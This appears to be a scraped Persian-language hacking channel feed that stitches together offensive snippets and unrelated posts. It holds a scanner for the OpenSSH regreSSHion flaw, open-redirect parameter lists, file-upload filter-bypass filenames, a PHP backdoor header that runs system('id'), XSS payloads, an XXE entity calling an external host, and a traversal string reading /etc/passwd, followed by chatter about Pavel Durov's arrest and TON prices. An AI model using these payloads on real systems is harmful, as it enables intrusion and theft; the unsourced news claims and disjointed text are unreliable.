nmap -sV -Pn -p22 -iL servers.txt | awk '/Nmap scan report/{ip=$5} /OpenSSH/ {
    if ($5 >= "8.5p1" && $5 < "9.8p1") {
        status = "Vulnerable to CVE-2024-6387"
    } else if ($5 >= "4.4p1" && $5 < "8.5p1") {
        status = "Not vulnerable to CVE-2024-6387 (patched for CVE-2006-5051)"
    } else if ($5 < "4.4p1") {
        status = "Vulnerable to regreSSHion (unless patched for CVE-2006-5051 and CVE-2008-4109)"
    }
    if (status) {
        print "Server: "ip"\t", "OpenSSH Version: "$5"\t", "Status: "status
        status = ""
    }
}'

بدون شک جاوااسکریپت جز سه زبان محبوب در کل دنیاست. آینده دار، بازار کار قوی و قدرت فوق‌العاده...

• ?dest={target}
• ?redirect={target}
• ?uri={target}
• ?path={target}
• ?continue={target}
• ?url={target}
• ?window={target}
• ?next={target}
• ?data={target}
• ?reference={target}
• ?site={target}
• ?html={target}
• ?val={target}
• ?validate={target}
• ?domain={target}
• ?callback={target}
• ?return={target}
• ?page={target}
• ?feed={target}
• ?host={target}
• ?port={target}
• ?to={target}
• ?out={target}
• ?view={target}
• ?dir={target}

→ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr

file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg

ابزار nikto برای اسکن وب سرورها و یافتن آسیب پذیری در برنامه های تحت وب است. این ابزار توانایی تجزیه و تحلیل سرورهای وب برای آسیب پذیری های شناخته شده، دایرکتوری های مخفی، فایل ها و سایر آبجکت های  خطرناک را فراهم می کند.
— این ابزار به طور فعال توسط جامعه امنیت اطلاعات توسعه یافته و برای اطمینان از کارایی بالا در تشخیص آسیب پذیری ها به روز شده است. ابزار nikto به دلیل انعطاف پذیری و طیف گسترده ای از ویژگی ها، یکی از محبوب ترین ابزارها برای ممیزی امنیت برنامه های وب است.

User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

<details open ontoggle="(()=>alertibrahimxss)()"></details>

"target/lib/css/animated.min.css"

"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

⭕️⭕️ ‌ ‌ درود دوستان ‌
ایشالله از فردا فعالیت چنل مثل سابق میشه.
کلی آموزش جدید و ابزار تو راه، پس پای کار باشید💀
⭕️ ‌‌ برای حمایت از چنل حتما برای پست‌ها ری‌اکشن بزارید و برای دوستانتون بفرستید.

⭕️ ‌ ‌ اکنون با دستگیری پاول دوروف شاهد کاهش چشمگیر ارزش رمزارز TON خواهیم بود.
⭕️ ‌‌ ‌ مدیرعامل و موسس تلگرام اعلام کردند که طبق پروتکل امنیتی که خود پاول دوروف طراحی کرده است در صورت دستگیری وی اطلاعات مهم کاربران از سیستم حذف خواهد شد تا تحت هر شرایطی دست دولت نیفتند.

ری‌اکشن زیر همین پست بالا باشه آموزش و سورس رو در اختیارتون میزارم.
If the reaction is high under this post, I will provide you with the training and source.